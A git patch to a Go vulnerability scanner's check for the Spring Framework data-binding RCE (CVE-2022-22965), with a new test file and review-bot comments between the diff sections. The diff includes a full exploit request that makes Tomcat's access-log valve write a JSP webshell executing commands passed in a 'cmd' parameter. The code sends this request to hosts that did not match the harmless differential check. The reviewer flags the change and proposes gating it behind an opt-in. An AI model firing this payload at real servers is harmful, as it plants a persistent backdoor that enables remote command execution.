From a254deec81f12543f18d0183dafae67a3e5d7e0c Mon Sep 17 00:00:00 2001
From: hktalent <18223385+hktalent@users.noreply.github.com>
Date: Thu, 13 Oct 2022 16:23:23 +0800
Subject: [PATCH] Spring Framework RCE via Data Binding on JDK 9+ (CVE-2022-22965) 2022-10-13
---
 pocs_go/Springboot/CVE-2022-22965.go | 17 ++++++++++-------
 pocs_go/Springboot/CVE-2022-22965_test.go | 23 +++++++++++++++++++++++
 2 files changed, 33 insertions(+), 7 deletions(-)
 create mode 100644 pocs_go/Springboot/CVE-2022-22965_test.go
diff --git a/pocs_go/Springboot/CVE-2022-22965.go b/pocs_go/Springboot/CVE-2022-22965.go
index 6b7fe0d73..9a9be67eb 100644
--- a/pocs_go/Springboot/CVE-2022-22965.go
+++ b/pocs_go/Springboot/CVE-2022-22965.go
@@ -8,17 +8,20 @@ import (
 )
 func CVE_2022_22965(u string) bool {
- if req, err := util.HttpRequset(u+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
- if req.StatusCode == 500 {
- if req2, err := util.HttpRequset(u+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
- if req2.StatusCode == 200 {
- return true
+ if oU, err := url.Parse(u); nil == err && oU.Host != "" {
+ szUrl := oU.Scheme + "://" + oU.Host
+ if req, err := util.HttpRequset(szUrl+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
+ if req.StatusCode == 500 {
+ if req2, err := util.HttpRequset(szUrl+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
+ if req2.StatusCode == 200 {
+ return true
+ }
 }
 }
 }
- }
- if oU, err := url.Parse(u); nil == err && oU.Host != "" {
+ cc := socket.NewCheckTarget(u, "tcp", 50)
+ defer cc.Close()
 cc.SendPayload([]byte(strings.ReplaceAll(`GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
 Host: `+oU.Host+`
 Accept-Encoding: gzip, deflate
diff --git a/pocs_go/Springboot/CVE-2022-22965_test.go b/pocs_go/Springboot/CVE-2022-22965_test.go
new file mode 100644
index 000000000..0d886695c
--- /dev/null
+++ b/pocs_go/Springboot/CVE-2022-22965_test.go
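Review bot: The new `cc := socket.NewCheckTarget(u, "tcp", 50)` / `cc.SendPayload(...)` lines run only when the harmless `class.module.classLoader[1]` 500-vs-200 differential did not match (the matching path has already returned true), so the intrusive request is fired precisely at hosts that showed no sign of the bug, and what it sends is not a probe: the `pipeline.first.pattern/directory/prefix/suffix` properties point Tomcat's access-log valve at `webapps/ROOT/tomcatwar.jsp` with a `Runtime.exec` backdoor keyed on `pwd=j&cmd=`, a persistent change to the target that a detection routine should never make implicitly. I would keep `CVE_2022_22965` to the differential check and move the webshell write behind an explicit opt-in (a separate function or a flag the caller must set), or at least write a file that proves write access without executing commands. The `%{c1}i`/`%{c2}i`/`%{suffix}i` placeholders in the pattern presumably come from request headers further down the raw string, which lies past this hunk as does the rest of the function, and `SendPayload`'s result is discarded on the visible line. Smaller points: `szUrl := oU.Scheme + "://" + oU.Host` drops any path in `u`, so a target given as `http://host/app/` is probed at `/` only, and `nil == err` should be the idiomatic `err == nil`.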
@@ -0,0 +1,23 @@
+package Springboot
+
+import "testing"
+
+func TestCVE_2022_22965(t *testing.T) {
+ type args struct {
+ u string
+ }
+ tests := []struct {
+ name string
+ args args
+ want bool
+ }{
+ {"test CVE_2022_22965", args{"http://127.0.0.1:8080"}, true},
+ }
+ for _, tt := range tests {
+ t.Run(tt.name, func(t *testing.T) {
+ if got := CVE_2022_22965(tt.args.u); got != tt.want {
+ t.Errorf("CVE_2022_22965() = %v, want %v", got, tt.want)
+ }
+ })
+ }
+}
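Review bot: `TestCVE_2022_22965` expects `true` from a live target at `http://127.0.0.1:8080`, so it fails under plain `go test ./...` wherever no vulnerable Spring/Tomcat is listening, and where something is listening the companion change makes the call send the webshell-writing request at whatever happens to sit on that port. Gate it on explicit opt-in, e.g. `target := os.Getenv("CVE_2022_22965_TARGET")` / `if target == "" { t.Skip("set CVE_2022_22965_TARGET to run this live check") }` and use `target` instead of the hard-coded URL (this adds an `os` import). A `testing.Short()` skip would also keep it out of routine runs, but an env-gated target states more clearly that this is an integration check against a host the operator chose.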